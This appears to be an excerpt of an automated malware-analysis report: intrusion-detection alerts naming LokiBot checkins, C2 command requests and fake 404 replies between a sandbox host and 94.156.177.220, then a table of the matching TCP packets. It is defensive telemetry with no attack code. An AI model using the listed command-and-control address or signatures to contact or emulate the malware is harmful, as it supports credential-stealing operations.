2024-10-25T10:21:43.771661+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:43.777737+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50056	TCP
2024-10-25T10:21:43.937769+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:43.937769+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:43.937769+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:44.922014+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:44.922014+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:44.927929+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50062	TCP
2024-10-25T10:21:45.077227+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:45.077227+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:45.077227+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:46.047555+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:46.047555+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:46.053961+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50073	TCP
2024-10-25T10:21:46.202323+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:46.202323+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:46.202323+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:47.209475+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:47.209475+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:47.216255+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50078	TCP
2024-10-25T10:21:47.377458+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:47.377458+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:47.377458+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:48.343222+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:48.343222+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:48.349012+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50085	TCP
2024-10-25T10:21:48.502508+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:48.502508+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:48.502508+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:49.489044+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:49.489044+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:49.494903+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50088	TCP
2024-10-25T10:21:49.659829+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:49.659829+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:49.659829+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:50.627196+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:50.627196+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:50.633330+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50089	TCP
2024-10-25T10:21:51.498324+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:51.498324+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:51.498324+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:52.356229+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:52.356229+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:52.362707+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50090	TCP
2024-10-25T10:21:52.518212+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:52.518212+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:52.518212+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:53.474653+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:53.474653+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:53.481146+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50091	TCP
2024-10-25T10:21:53.649173+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:53.649173+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:53.649173+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:54.628216+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:54.628216+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:54.634280+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50092	TCP
2024-10-25T10:21:54.809440+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:54.809440+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:54.809440+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:55.755063+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:55.755063+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:55.761443+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50093	TCP
2024-10-25T10:21:55.924734+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:55.924734+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:55.924734+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:56.895578+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:56.895578+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:56.901726+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50094	TCP
2024-10-25T10:21:57.172837+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:57.172837+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:57.172837+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:58.166256+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:58.166256+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:58.172981+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50095	TCP
2024-10-25T10:21:58.339192+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:58.339192+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:58.339192+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:59.355701+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:59.355701+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:59.361507+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50096	TCP
2024-10-25T10:21:59.527535+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:21:59.527535+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:21:59.527535+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:00.539507+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:00.539507+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:00.545385+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50097	TCP
2024-10-25T10:22:01.017571+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:01.017571+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:01.017571+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:02.033727+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:02.033727+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:02.039544+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50098	TCP
2024-10-25T10:22:02.183819+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:02.183819+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:02.183819+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:03.140267+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:03.140267+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:03.146388+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50099	TCP
2024-10-25T10:22:04.446102+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:04.446102+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:04.446102+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:05.410348+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:05.410348+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:05.416568+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50100	TCP
2024-10-25T10:22:05.576112+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:05.576112+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:05.576112+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:06.540301+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:06.540301+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:06.546217+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50101	TCP
2024-10-25T10:22:06.709690+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50102	94.156.177.220	80	TCP
2024-10-25T10:22:06.709690+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50102	94.156.177.220	80	TCP
2024-10-25T10:22:06.709690+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50102	94.156.177.220	80	TCP
2024-10-25T10:22:07.717612+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50102	94.156.177.220	80	TCP
2024-10-25T10:22:07.717612+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50102	94.156.177.220	80	TCP
2024-10-25T10:22:07.827411+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.4	50102	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 10:20:01.406461000 CEST	49730	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:01.415404081 CEST	80	49730	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:01.415537119 CEST	49730	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:01.417874098 CEST	49730	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:01.423949957 CEST	80	49730	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:01.424021959 CEST	49730	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:01.430246115 CEST	80	49730	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:02.396137953 CEST	80	49730	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:02.412266970 CEST	49730	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:02.418374062 CEST	80	49730	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:02.418469906 CEST	49730	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:03.034248114 CEST	49731	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:03.040108919 CEST	80	49731	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:03.040198088 CEST	49731	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:03.042490005 CEST	49731	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:03.047882080 CEST	80	49731	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:03.047947884 CEST	49731	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:03.053308964 CEST	80	49731	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:04.019900084 CEST	80	49731	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:04.020145893 CEST	49731	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:04.025937080 CEST	80	49731	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:04.026000023 CEST	49731	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:04.079574108 CEST	49732	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:04.085165024 CEST	80	49732	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:04.085272074 CEST	49732	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:04.087390900 CEST	49732	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:04.092864037 CEST	80	49732	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:04.092936039 CEST	49732	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:04.098952055 CEST	80	49732	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:05.060925961 CEST	80	49732	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:05.061101913 CEST	49732	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:05.071273088 CEST	80	49732	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:05.071409941 CEST	49732	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:05.217653990 CEST	49733	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:05.223222017 CEST	80	49733	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:05.223352909 CEST	49733	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:05.225447893 CEST	49733	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:05.231029034 CEST	80	49733	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:05.231107950 CEST	49733	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:05.238399029 CEST	80	49733	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:06.203742981 CEST	80	49733	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:06.219415903 CEST	49733	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:06.226237059 CEST	80	49733	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:06.226308107 CEST	49733	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:06.359038115 CEST	49734	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:06.364835024 CEST	80	49734	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:06.364921093 CEST	49734	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:06.367363930 CEST	49734	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:06.375502110 CEST	80	49734	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:06.375575066 CEST	49734	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:06.381289959 CEST	80	49734	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:07.328375101 CEST	80	49734	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:07.328676939 CEST	49734	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:07.334472895 CEST	80	49734	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:07.335333109 CEST	49734	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:07.471416950 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:07.477169037 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:07.477252007 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:07.479399920 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:07.485313892 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:07.485394001 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:07.494689941 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.431647062 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.431886911 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.432485104 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.432543039 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.432574987 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.432626963 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.432967901 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.433017015 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.433762074 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.433809996 CEST	49735	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.437349081 CEST	80	49735	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.581207037 CEST	49736	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.586941957 CEST	80	49736	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.587016106 CEST	49736	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.590027094 CEST	49736	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.597122908 CEST	80	49736	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:09.597187996 CEST	49736	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:09.606405973 CEST	80	49736	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:10.553689957 CEST	80	49736	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:10.553812981 CEST	49736	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:10.560447931 CEST	80	49736	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:10.560514927 CEST	49736	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:10.702167988 CEST	49737	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:10.707597017 CEST	80	49737	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:10.707724094 CEST	49737	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:10.709742069 CEST	49737	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:10.715065002 CEST	80	49737	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:10.715159893 CEST	49737	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:10.720493078 CEST	80	49737	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:11.671643019 CEST	80	49737	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:11.713418007 CEST	49737	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:11.719388962 CEST	80	49737	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:11.719474077 CEST	49737	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:12.296291113 CEST	49738	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:12.302164078 CEST	80	49738	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:12.302246094 CEST	49738	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:12.304312944 CEST	49738	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:12.310060978 CEST	80	49738	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:12.310127020 CEST	49738	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:12.315501928 CEST	80	49738	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:13.293423891 CEST	80	49738	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:13.293591976 CEST	49738	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:13.299727917 CEST	80	49738	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:13.299810886 CEST	49738	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:13.438617945 CEST	49739	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:13.444540024 CEST	80	49739	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:13.444662094 CEST	49739	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:13.446667910 CEST	49739	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:13.452518940 CEST	80	49739	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:13.452611923 CEST	49739	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:13.458034039 CEST	80	49739	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:14.398870945 CEST	80	49739	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:14.398997068 CEST	49739	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:14.406008959 CEST	80	49739	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:14.406076908 CEST	49739	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:14.578198910 CEST	49740	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:14.584299088 CEST	80	49740	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:14.584453106 CEST	49740	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:14.587332964 CEST	49740	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:14.592967987 CEST	80	49740	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:14.593029022 CEST	49740	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:14.600707054 CEST	80	49740	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:15.567843914 CEST	80	49740	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:15.568039894 CEST	49740	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:15.575284958 CEST	80	49740	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:15.575661898 CEST	49740	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:15.738233089 CEST	49741	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:15.743937969 CEST	80	49741	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:15.744045019 CEST	49741	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:15.746071100 CEST	49741	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:15.751538992 CEST	80	49741	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:15.751616955 CEST	49741	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:15.757064104 CEST	80	49741	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:16.716876984 CEST	80	49741	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:16.716990948 CEST	49741	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:16.722909927 CEST	80	49741	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:16.722975969 CEST	49741	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:16.859481096 CEST	49744	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:20:16.865134954 CEST	80	49744	94.156.177.220	192.168.2.4
Oct 25, 2024 10:20:16.865231991 CEST	49744	80	192.168.2.4	94.156.177.220
